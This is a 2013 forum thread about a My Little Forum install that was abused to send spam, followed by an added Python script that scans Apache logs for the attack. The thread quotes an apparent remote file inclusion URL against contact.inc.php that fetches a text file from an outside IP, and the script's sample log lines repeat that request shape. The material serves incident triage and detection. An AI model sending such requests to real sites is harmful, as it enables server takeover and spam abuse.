Site with just MLF is sending out spam and host disabled me. (General)

by MLF User, Tuesday, March 26, 2013, 01:06 (4073 days ago) @ Auge

Hello

Hi, I have a site with nothing but MLF running on it and my site has been disabled due to my site sending out spam. I came to see if there was an updated version and it seems I have the latest version. After searching Google, I can't find a fix (though there are several other exploits out there with this version) and another forum saying their MLF has been disabled due to the script sending out spam. Has anyone found a fix on how to stop this? Does anyone else know of a threaded forum like this that is more secure?


What is your forum configuration? Who can post in your forum (everyone or registered users)? Did your hoster tell you which function was abused (posting form, contact form)?

Tschö, Auge

Hi, sorry about the delay.
I had it set up that only registered users could post.
HostGator finally got back with me and told me that MLF is known to be a vulnerable script and that it is no longer maintained by the developers. I had a friend look at some things before we shut down the account and he said the same time the spams were going out, the file /includes/contact.inc.php was getting hit by several IP addresses at the same time and the URL it was using was very weird. It was like
http://mydomain.com/includes/contact.inc.php//v//@//@//$admin/@/?http://218.69.248.24/hapy.txt

This isn't the exact URL that was shown in the apache logs but it was a bunch of slashes, @ signs, $admin, and they all ended with that ?http://218.69.248.24/hapy.txt

At the time he found this (the next day), we tried to bring up http://218.69.248.24/hapy.txt but it wouldn't load.

We left HostGator and went with a new host from his suggestion and now using a different forum, but we wanted one that had a tree view like the one this does, not the kind we're using now (SMF) since that's what our members wanted, it was like the old school UBB type of forum.

I asked him to come here and post what he knows, but it doesn't look like he has yet. The original admin of our forum is gravely ill and now it's just 3 of us taking it over and we're not quite sure what we are doing but this is as much info as I know and hope it helps.
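
Added example, not part of the original post or of MLF: a log triage script that finds the request shape described above, a directly requested `.inc.php` file whose whole query string is a remote URL, and groups the hits by script and client IP. It assumes Apache "combined" log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache "combined" access-log format is assumed.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Query string that is nothing but a remote URL (checked after percent-decoding).
REMOTE_QUERY_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Include files are meant to be loaded by the application, not requested directly.
INCLUDE_RE = re.compile(r'\.inc\.php(?=/|$)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:00:58:01 +0000] "GET /includes/contact.inc.php'
    '//v//@//@//$admin/@/?http://198.51.100.7/x.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [01/Jan/2013:00:58:01 +0000] "GET /includes/contact.inc.php'
    '//@/?http%3A%2F%2F198.51.100.7%2Fx.txt HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.5 - - [01/Jan/2013:00:58:03 +0000] "GET /index.php?mode=contact '
    'HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [01/Jan/2013:00:58:04 +0000] "GET /index.php?id=42&ref='
    'http://example.org/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

def suspicious_hits(lines):
    """Return (client_ip, script, remote_url, status) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, status = m.groups()
        path, _, query = target.partition('?')
        inc = INCLUDE_RE.search(path)
        remote = unquote(query)
        if inc and REMOTE_QUERY_RE.match(remote):
            # Trim the junk path segments after the script name.
            hits.append((ip, path[:inc.end()], remote, int(status)))
    return hits

def summarize(hits):
    """Group hits by script: request count, distinct clients, distinct remote URLs."""
    out = defaultdict(lambda: {"requests": 0, "clients": set(), "remote_urls": set()})
    for ip, script, remote, _ in hits:
        out[script]["requests"] += 1
        out[script]["clients"].add(ip)
        out[script]["remote_urls"].add(remote)
    return dict(out)
```

Running `summarize(suspicious_hits(open(path)))` over the real access log gives the list of client IPs and remote URLs to hand to the host, and the status codes in the raw hits show whether the server answered those requests at all.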

